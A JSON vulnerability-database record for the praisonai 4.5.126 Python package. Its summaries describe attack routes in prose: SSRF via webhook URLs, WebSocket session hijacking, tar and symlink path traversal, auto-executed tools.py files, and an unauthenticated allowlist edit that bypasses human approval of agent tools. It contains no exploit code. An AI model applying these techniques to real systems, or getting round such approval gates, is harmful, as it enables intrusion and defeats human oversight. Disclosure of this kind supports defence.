{"url":"http://public2.vulnerablecode.io/api/packages/1003001?format=json","purl":"pkg:pypi/praisonai@4.5.126","type":"pypi","namespace":"","name":"praisonai","version":"4.5.126","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"4.6.37","latest_non_vulnerable_version":"4.6.40","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/84094?format=json","vulnerability_id":"VCID-1qgq-hzty-a7hq","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, the /api/v1/runs endpoint accepts an arbitrary webhook_url in the request body with no URL validation. When a submitted job completes (success or failure), the server makes an HTTP POST request to this URL using httpx.AsyncClient. An unauthenticated attacker can use this to make the server send POST requests to arbitrary internal or external destinations, enabling SSRF against cloud metadata services, internal APIs, and other network-adjacent services. This vulnerability is fixed in 4.5.128.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40114","reference_id":"","reference_type":"","scores":[{"value":"0.00063","scoring_system":"epss","scoring_elements":"0.20136","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00063","scoring_system":"epss","scoring_elements":"0.19967","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00063","scoring_system":"epss","scoring_elements":"0.2016","published_at":"2026-06-13T12:55:00Z"},{"value":"0.00063","scoring_system":"epss","scoring_elements":"0.2014","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40114"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40114","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40114"},{"reference_url":"https://github.com/advisories/GHSA-8frj-8q3m-xhgm","reference_id":"GHSA-8frj-8q3m-xhgm","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8frj-8q3m-xhgm"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-8frj-8q3m-xhgm","reference_id":"GHSA-8frj-8q3m-xhgm","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T20:38:35Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-8frj-8q3m-xhgm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373330?format=json","purl":"pkg:pypi/praisonai@4.5.128","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5bh1-sfdc-ufcv"},{"vulnerability":"VCID-9h3n-jwrn-q3c7"},{"vulnerability":"VCID-9vfs-jdzz-ckcp"},{"vulnerability":"VCID-dwef-8k3v-jfb6"},{"vulnerability":"VCID-ekcf-zxgu-8yh1"},{"vulnerability":"VCID-fd7b-5q1f-qkh9"},{"vulnerability":"VCID-fnbr-df5j-hkay"},{"vulnerability":"VCID-gnv9-my7f-e7dc"},{"vulnerability":"VCID-nzu9-64um-47h7"},{"vulnerability":"VCID-vuwr-p2ef-w3ay"},{"vulnerability":"VCID-xzqd-zpz6-pbfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.128"}],"aliases":["CVE-2026-40114","GHSA-8frj-8q3m-xhgm"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1qgq-hzty-a7hq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/84333?format=json","vulnerability_id":"VCID-5bh1-sfdc-ufcv","summary":"PraisonAI is a multi-agent teams system. In versions below 4.5.139 of PraisonAI and 1.5.140 of praisonaiagents, the browser bridge (praisonai browser start) is vulnerable to unauthenticated remote session hijacking due to missing authentication and a bypassable origin check on its /ws WebSocket endpoint. The server binds to 0.0.0.0 by default and only validates the Origin header when one is present, meaning any non-browser client that omits the header is accepted without restriction. An unauthenticated network attacker can connect, send a start_session message, and the server will route it to the first idle browser-extension WebSocket (effectively hijacking that session) and then broadcast all resulting automation actions and outputs back to the attacker. This enables unauthorized remote control of connected browser automation sessions, leakage of sensitive page context and automation results, and misuse of model-backed browser actions in any environment where the bridge is network-reachable. This issue has been fixed in versions 4.5.139 of PraisonAI and 1.5.140 of praisonaiagents.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40289","reference_id":"","reference_type":"","scores":[{"value":"0.00073","scoring_system":"epss","scoring_elements":"0.22556","published_at":"2026-06-13T12:55:00Z"},{"value":"0.00073","scoring_system":"epss","scoring_elements":"0.22539","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00073","scoring_system":"epss","scoring_elements":"0.2235","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00073","scoring_system":"epss","scoring_elements":"0.22543","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40289"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.139","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.139"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40289","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40289"},{"reference_url":"https://github.com/advisories/GHSA-8x8f-54wf-vv92","reference_id":"GHSA-8x8f-54wf-vv92","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8x8f-54wf-vv92"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-8x8f-54wf-vv92","reference_id":"GHSA-8x8f-54wf-vv92","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T20:18:27Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-8x8f-54wf-vv92"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373700?format=json","purl":"pkg:pypi/praisonai@4.5.139","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9h3n-jwrn-q3c7"},{"vulnerability":"VCID-9vfs-jdzz-ckcp"},{"vulnerability":"VCID-fd7b-5q1f-qkh9"},{"vulnerability":"VCID-fnbr-df5j-hkay"},{"vulnerability":"VCID-gnv9-my7f-e7dc"},{"vulnerability":"VCID-nzu9-64um-47h7"},{"vulnerability":"VCID-t4qq-sgqa-ubet"},{"vulnerability":"VCID-vuwr-p2ef-w3ay"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.139"}],"aliases":["CVE-2026-40289","GHSA-8x8f-54wf-vv92"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5bh1-sfdc-ufcv"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/83909?format=json","vulnerability_id":"VCID-6eh4-hq2x-r3eh","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, PraisonAI treats remotely fetched template files as trusted executable code without integrity verification, origin validation, or user confirmation, enabling supply chain attacks through malicious templates. This vulnerability is fixed in 4.5.128.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40154","reference_id":"","reference_type":"","scores":[{"value":"0.00053","scoring_system":"epss","scoring_elements":"0.17215","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00053","scoring_system":"epss","scoring_elements":"0.17201","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00053","scoring_system":"epss","scoring_elements":"0.17056","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00053","scoring_system":"epss","scoring_elements":"0.17228","published_at":"2026-06-13T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40154"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128","reference_id":"","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40154","reference_id":"","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40154"},{"reference_url":"https://github.com/advisories/GHSA-pv9q-275h-rh7x","reference_id":"GHSA-pv9q-275h-rh7x","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-pv9q-275h-rh7x"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-pv9q-275h-rh7x","reference_id":"GHSA-pv9q-275h-rh7x","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-10T17:08:52Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-pv9q-275h-rh7x"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373330?format=json","purl":"pkg:pypi/praisonai@4.5.128","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5bh1-sfdc-ufcv"},{"vulnerability":"VCID-9h3n-jwrn-q3c7"},{"vulnerability":"VCID-9vfs-jdzz-ckcp"},{"vulnerability":"VCID-dwef-8k3v-jfb6"},{"vulnerability":"VCID-ekcf-zxgu-8yh1"},{"vulnerability":"VCID-fd7b-5q1f-qkh9"},{"vulnerability":"VCID-fnbr-df5j-hkay"},{"vulnerability":"VCID-gnv9-my7f-e7dc"},{"vulnerability":"VCID-nzu9-64um-47h7"},{"vulnerability":"VCID-vuwr-p2ef-w3ay"},{"vulnerability":"VCID-xzqd-zpz6-pbfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.128"}],"aliases":["CVE-2026-40154","GHSA-pv9q-275h-rh7x"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-6eh4-hq2x-r3eh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/84434?format=json","vulnerability_id":"VCID-6fjd-fe2x-z7f9","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, cmd_unpack in the recipe CLI extracts .praison tar archives using raw tar.extract() without validating archive member paths. A .praison bundle containing ../../ entries will write files outside the intended output directory. An attacker who distributes a malicious bundle can overwrite arbitrary files on the victim's filesystem when they run praisonai recipe unpack. This vulnerability is fixed in 4.5.128.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40157","reference_id":"","reference_type":"","scores":[{"value":"0.00084","scoring_system":"epss","scoring_elements":"0.2472","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00084","scoring_system":"epss","scoring_elements":"0.24528","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00084","scoring_system":"epss","scoring_elements":"0.24735","published_at":"2026-06-13T12:55:00Z"},{"value":"0.00084","scoring_system":"epss","scoring_elements":"0.24723","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40157"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128","reference_id":"","reference_type":"","scores":[{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40157","reference_id":"","reference_type":"","scores":[{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40157"},{"reference_url":"https://github.com/advisories/GHSA-99g3-w8gr-x37c","reference_id":"GHSA-99g3-w8gr-x37c","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-99g3-w8gr-x37c"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-99g3-w8gr-x37c","reference_id":"GHSA-99g3-w8gr-x37c","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-14T14:13:25Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-99g3-w8gr-x37c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373330?format=json","purl":"pkg:pypi/praisonai@4.5.128","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5bh1-sfdc-ufcv"},{"vulnerability":"VCID-9h3n-jwrn-q3c7"},{"vulnerability":"VCID-9vfs-jdzz-ckcp"},{"vulnerability":"VCID-dwef-8k3v-jfb6"},{"vulnerability":"VCID-ekcf-zxgu-8yh1"},{"vulnerability":"VCID-fd7b-5q1f-qkh9"},{"vulnerability":"VCID-fnbr-df5j-hkay"},{"vulnerability":"VCID-gnv9-my7f-e7dc"},{"vulnerability":"VCID-nzu9-64um-47h7"},{"vulnerability":"VCID-vuwr-p2ef-w3ay"},{"vulnerability":"VCID-xzqd-zpz6-pbfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.128"}],"aliases":["CVE-2026-40157","GHSA-99g3-w8gr-x37c"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-6fjd-fe2x-z7f9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/84156?format=json","vulnerability_id":"VCID-75sa-xf7h-b7f3","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, the gateway's /api/approval/allow-list endpoint permits unauthenticated modification of the tool approval allowlist when no auth_token is configured (the default). By adding dangerous tool names (e.g., shell_exec, file_write) to the allowlist, an attacker can cause the ExecApprovalManager to auto-approve all future agent invocations of those tools, bypassing the human-in-the-loop safety mechanism that the approval system is specifically designed to enforce. This vulnerability is fixed in 4.5.128.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40149","reference_id":"","reference_type":"","scores":[{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03305","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03306","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03291","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03292","published_at":"2026-06-13T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40149"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"7.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128","reference_id":"","reference_type":"","scores":[{"value":"7.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40149","reference_id":"","reference_type":"","scores":[{"value":"7.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40149"},{"reference_url":"https://github.com/advisories/GHSA-4wr3-f4p3-5wjh","reference_id":"GHSA-4wr3-f4p3-5wjh","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4wr3-f4p3-5wjh"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-4wr3-f4p3-5wjh","reference_id":"GHSA-4wr3-f4p3-5wjh","reference_type":"","scores":[{"value":"7.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T15:28:35Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-4wr3-f4p3-5wjh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373330?format=json","purl":"pkg:pypi/praisonai@4.5.128","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5bh1-sfdc-ufcv"},{"vulnerability":"VCID-9h3n-jwrn-q3c7"},{"vulnerability":"VCID-9vfs-jdzz-ckcp"},{"vulnerability":"VCID-dwef-8k3v-jfb6"},{"vulnerability":"VCID-ekcf-zxgu-8yh1"},{"vulnerability":"VCID-fd7b-5q1f-qkh9"},{"vulnerability":"VCID-fnbr-df5j-hkay"},{"vulnerability":"VCID-gnv9-my7f-e7dc"},{"vulnerability":"VCID-nzu9-64um-47h7"},{"vulnerability":"VCID-vuwr-p2ef-w3ay"},{"vulnerability":"VCID-xzqd-zpz6-pbfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.128"}],"aliases":["CVE-2026-40149","GHSA-4wr3-f4p3-5wjh"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-75sa-xf7h-b7f3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/84350?format=json","vulnerability_id":"VCID-8v96-2qfj-kqer","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, PraisonAI automatically loads a file named tools.py from the current working directory to discover and register custom agent tools. This loading process uses importlib.util.spec_from_file_location and immediately executes module-level code via spec.loader.exec_module() without explicit user consent, validation, or sandboxing. The tools.py file is loaded implicitly, even when it is not referenced in configuration files or explicitly requested by the user. As a result, merely placing a file named tools.py in the working directory is sufficient to trigger code execution. This behavior violates the expected security boundary between user-controlled project files (e.g., YAML configurations) and executable code, as untrusted content in the working directory is treated as trusted and executed automatically. If an attacker can place a malicious tools.py file into a directory where a user or automated system (e.g., CI/CD pipeline) runs praisonai, arbitrary code execution occurs immediately upon startup, before any agent logic begins.  This vulnerability is fixed in 4.5.128.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40156","reference_id":"","reference_type":"","scores":[{"value":"0.00027","scoring_system":"epss","scoring_elements":"0.08313","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00027","scoring_system":"epss","scoring_elements":"0.08275","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00027","scoring_system":"epss","scoring_elements":"0.08314","published_at":"2026-06-13T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40156"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40156","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40156"},{"reference_url":"https://github.com/advisories/GHSA-2g3w-cpc4-chr4","reference_id":"GHSA-2g3w-cpc4-chr4","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2g3w-cpc4-chr4"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-2g3w-cpc4-chr4","reference_id":"GHSA-2g3w-cpc4-chr4","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-13T15:29:56Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-2g3w-cpc4-chr4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373330?format=json","purl":"pkg:pypi/praisonai@4.5.128","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5bh1-sfdc-ufcv"},{"vulnerability":"VCID-9h3n-jwrn-q3c7"},{"vulnerability":"VCID-9vfs-jdzz-ckcp"},{"vulnerability":"VCID-dwef-8k3v-jfb6"},{"vulnerability":"VCID-ekcf-zxgu-8yh1"},{"vulnerability":"VCID-fd7b-5q1f-qkh9"},{"vulnerability":"VCID-fnbr-df5j-hkay"},{"vulnerability":"VCID-gnv9-my7f-e7dc"},{"vulnerability":"VCID-nzu9-64um-47h7"},{"vulnerability":"VCID-vuwr-p2ef-w3ay"},{"vulnerability":"VCID-xzqd-zpz6-pbfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.128"}],"aliases":["CVE-2026-40156","GHSA-2g3w-cpc4-chr4"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8v96-2qfj-kqer"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/67916?format=json","vulnerability_id":"VCID-9h3n-jwrn-q3c7","summary":"PraisonAI is a multi-agent teams system. Prior to version 4.6.37, the _safe_extractall helper that all recipe pull, recipe publish, and recipe unpack flows route through validates each archive member's name for absolute paths, .. segments, and resolved-path escape — but does not validate member.linkname, does not reject symlink/hardlink members, and calls tar.extractall(dest_dir) without filter=\"data\". A bundle that contains a symlink with a name inside dest_dir but a linkname pointing outside it, followed by a regular file whose path traverses through the just-created symlink, escapes dest_dir and lets the attacker write arbitrary content to an attacker-chosen location on the victim's filesystem. This issue has been patched in version 4.6.37.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44340","reference_id":"","reference_type":"","scores":[{"value":"0.00025","scoring_system":"epss","scoring_elements":"0.07427","published_at":"2026-06-13T12:55:00Z"},{"value":"0.00025","scoring_system":"epss","scoring_elements":"0.07418","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00025","scoring_system":"epss","scoring_elements":"0.07398","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00025","scoring_system":"epss","scoring_elements":"0.07434","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44340"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44340","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44340"},{"reference_url":"https://github.com/advi